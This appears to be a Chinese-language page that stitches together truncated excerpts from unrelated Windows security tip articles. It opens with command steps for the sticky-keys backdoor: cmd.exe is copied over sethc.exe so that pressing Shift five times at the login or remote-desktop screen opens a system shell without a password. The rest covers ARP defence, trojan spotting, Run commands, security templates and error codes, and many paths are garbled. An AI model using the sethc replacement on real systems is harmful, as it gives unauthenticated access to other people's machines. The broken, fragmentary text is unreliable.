这篇文章里说的方法和欠钱前2天说的用explorer.exe替换sethc.exe然后在3389下用5次shift获得资源管理器的方法差不多,不过做了一些扩展,蛮有意思~
在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。
XP:
| 将安装源光盘弹出(或将硬盘上的安装目录改名) cd %widnir%system32dllcache ren sethc.exe *.ex~ cd %widnir%system32 copy /y cmd.exe sethc.exe |
VISTA:
| takeown /f c:windowssystem32sethc.exe cacls c:windowssystem32sethc.exe /G administrator:F 然后按XP方法替换文件 |
ARP欺骗通过伪造IP地址和MAC地址实现,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。 笔者将介绍四种利用自制批处理文件来防御ARP攻击的方法。 一、把下面语句编成BAT处理文件 @echo off 。。。。。。。。。。。。。。。
奇虎360安全中心最近发布的《互联网不安全报告》中披露,2007年上半年奇虎共截获病毒、恶意软件及木马程序共计168135个,其中木马程序占据了80%的比例。比如著名的“灰鸽子”木马,仅不完全统计就有大概6万个变种。 可见在现今阶段的互联网,木马的危害已经占据了主导。 谈“马”色变并不是空穴来风,你可能觉得自己已经安装了最新版本的杀毒软件和防火墙,自认铜墙铁壁、百毒不侵。可要命的变种木马程序让病毒库防不胜防。毕竟是先有病毒,再有病毒库更新。目前各大杀毒公司纷纷进入主动杀毒/防御领域,正是因为大家已经意识到面对最新木马病毒的查杀,时间是最关键的因素! 那现阶段呢?我们这些饱受侵害的用户该做些什么呢?其实木马发展到现在,最重要的因素就是其很好的利用了社会工程学原理,在伪装和侵入方式上下足了功夫。这对于木马的整个入侵程序来说最为重要——换句话说:你需要运行木马,才能让自己的计算机中招!今天就针对这一环节,分析当前木马惯用伎俩,不用杀毒软件也能分辨出木马程序。
对于用惯了鼠标的朋友来说,Windows系统里的“运行”命令恐怕算得上是“老古董”了,但是有些时候,使用它却可以让繁琐的操作变得轻松自如,下面就让我来告诉你如何利用“运行”命令的七种武器来纵横于Windows江湖吧! 首先我们通过单击“开始→运行”命令,打开“运行”对话框,逐一输入以下命令: 1. Winmsd--初涉江湖“孔雀翎”:该命令可以打开“系统信息”窗口,供用户查看Windows系统的硬件资源、组件和软件资源等信息,让你将系统一览无余。.....................
在浏览器界,微软以其操作系统得天独厚的优势,让IE稳稳的坐上头把交椅。也同样是因为使用者众多,漏洞频频,让很多用户感觉IE不甚安全,稳定性很差。有这么糟糕么?如果你正在用IE6的话,新建一个文本,输入引号中的内容“[code]
[/code]”,保存成一个html文件,用IE打开它,竟然出现错误关闭窗口。这不过是个小把戏,因为它并没给你造成什么实质性的伤害。 反过来,客观的说.......
Windows XP操作系统提供了强大的安全机制,但是如果要一一设置这些安全配置,却是非常费时、费力的事,那么有没有一种可以快速配置安全选项的办法呢?答案是肯定的,用安全模板就能快速、批量地设定所有安全选项。
一、了解安全模板
"安全模板"是一种可以定义安全策略的文件表示方式,它能够配置账户和本地策略、事件日志、受限组、文件系统、注册表以及系统服务等项目的安全设置。安全模板都以.inf格式的文本文件存在,用户可以方便地复制、粘贴、导入或导出某些模板。此外,安全模板并不引入新的安全参数,而只是将所有现有的安全属性组织到一个位置以简化安全性管理,并且提供了一种快速批量修改安全选项的方法。
一台操作系统为Win2000 Server的笔记本电脑最近被感染了病毒,我首先用相关杀毒软件来扫描计算机,扫描报告如下: 病毒名称:Hacktool 文件名:c:winntsystem32 tservice.exe 操作:删除失败,隔离失败,访问被拒绝 如何才能彻底 删除呢?.......
0 0x0000作业完成。 1 0x0001不正确的函数。 2 0x0002系统找不到指定的档案。 3 0x0003系统找不到指定的路径。 4 0x0004系统无法开启档案。 5 0x0005拒绝存取。 6 0x0006无效的代码。 ..............................
现在有很多的病毒可以让你无法显示隐藏文件,遇到这种情况,你可以试试以下几种方法。 一、将下面的内容复制到记事本,保存为reg的注册表信息文件,然后双击导入。 注意:修改前务必备份注册表项。 Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAR........